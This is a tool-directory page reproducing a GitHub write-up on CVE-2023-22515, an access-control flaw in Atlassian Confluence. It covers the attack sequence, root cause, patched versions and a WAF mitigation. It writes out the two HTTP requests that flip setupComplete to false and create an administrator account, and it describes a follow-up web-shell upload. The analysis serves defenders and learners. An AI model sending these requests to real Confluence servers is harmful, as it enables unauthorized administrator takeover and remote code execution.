Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2023-22515-1 — Technical analysis and proof-of-concept exploit for CVE-2023-22515, a critical broken access control vulnerability in Atlassian Confluence allowing unauthenticated admin account creation and system compromise. | Kitploit
Tools/GitHubGitHub/dkq-k/cve-2023-22515-1
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubdkq-k/cve-2023-22515-1

cve-2023-22515-1

Technical analysis and proof-of-concept exploit for CVE-2023-22515, a critical broken access control vulnerability in Atlassian Confluence allowing unauthenticated admin account creation and system compromise.

View Repository
68 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🛡️ CVE-2023-22515: In-Depth Analysis of Confluence Privilege Escalation Vulnerability

[!IMPORTANT] Urgent Security Alert: This vulnerability has a CVSS score of 10.0 (Critical), the highest risk level. If you are using an affected version, immediate patching is required.

1. Overview

CVE-2023-22515 is a critical Broken Access Control vulnerability discovered in Atlassian Confluence Data Center and Server. An attacker can remotely manipulate the server's configuration state without authentication, create an administrator account, and fully compromise the system.

ItemDetails
Vulnerability IDCVE-2023-22515
SeverityCRITICAL (CVSS 10.0)
Affected Versions8.0.0 ~ 8.5.1 (check specific versions)
Attack TypeAuthentication bypass and privilege escalation

2. Attack Mechanism

This vulnerability is triggered by an attacker changing the bootstrapStatusProvider.applicationConfig.setupComplete value to false via the /server-info.action endpoint.

🔍 Attack Sequence Diagram

sequenceDiagram
    participant Attacker as 😈 공격자
    participant Server as 🖥️ Confluence 서버
    participant Config as ⚙️ 설정 관리자

    Note over Attacker, Server: 1단계: 설정 상태 초기화 공격
    Attacker->>Server: GET /server-info.action?setupComplete=false
    Server->>Config: 메모리 상의 설정 완료 플래그 해제
    Config-->>Server: 상태 변경 완료 (설치 모드로 전환)
    Server-->>Attacker: HTTP 200/302 OK

    Note over Attacker, Server: 2단계: 관리자 계정 생성
    Attacker->>Server: POST /setup/setupadministrator.action<br/>(새로운 관리자 정보 전송)
    Server->>Server: 보안 검증 우회 (설치 모드라 허용됨)
    Server-->>Attacker: 계정 생성 성공 및 로그인

    Note over Attacker, Server: 3단계: 시스템 장악 (RCE)
    Attacker->>Server: 악성 플러그인 업로드 (Web Shell)
    Server-->>Attacker: 원격 명령 실행 권한 획득

[!NOTE] Core Principle: Instead of modifying the persistent configuration file (confluence.cfg.xml), this attack bypasses access control logic by altering runtime state in memory.

3. Technical Analysis

Root Cause

This vulnerability is caused by a parameter binding flaw in the XWork2 framework and the lack of external input validation for the sensitive attribute (setupComplete) in Confluence's action class (ServerInfoAction).

HTTP Request Example

An attacker can incapacitate the server with simple HTTP requests.

1. Configuration Reset Request:

GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com

2. Admin Creation Request:

POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...

4. Vulnerability Reproduction (PoC & Demo)

The reproduction kit (cve-2023-22515-repro) provided with this report allows you to practice the vulnerability in a safe Docker environment.

🎥 Cinematic Demo

Includes a demo script to visually observe the actual hacking process in the terminal.

# Demo execution command
bash cinematic_pwn.sh

[!TIP] The demo script automatically performs an attack against a real server (localhost:8090), creates an administrator account, and attempts to log in, showing the entire process.

5. Mitigation

✅ Apply Latest Patch (Recommended)

The most reliable solution is to upgrade to a fixed version provided by Atlassian.

  • Version 8.3.3 or later
  • Version 8.4.3 or later
  • Version 8.5.2 or later

⚠️ Temporary Mitigation

If patching is difficult, block access to the following URL patterns using network security devices (WAF, load balancer, etc.).

  • */setup/*

6. Conclusion

CVE-2023-22515 is a critical vulnerability with very low attack complexity that can lead to full system compromise. Security administrators should apply patches immediately and monitor for potential breaches.


Date: 2026-01-16 | Author: Antigravity Security Analysis Team

Download Tool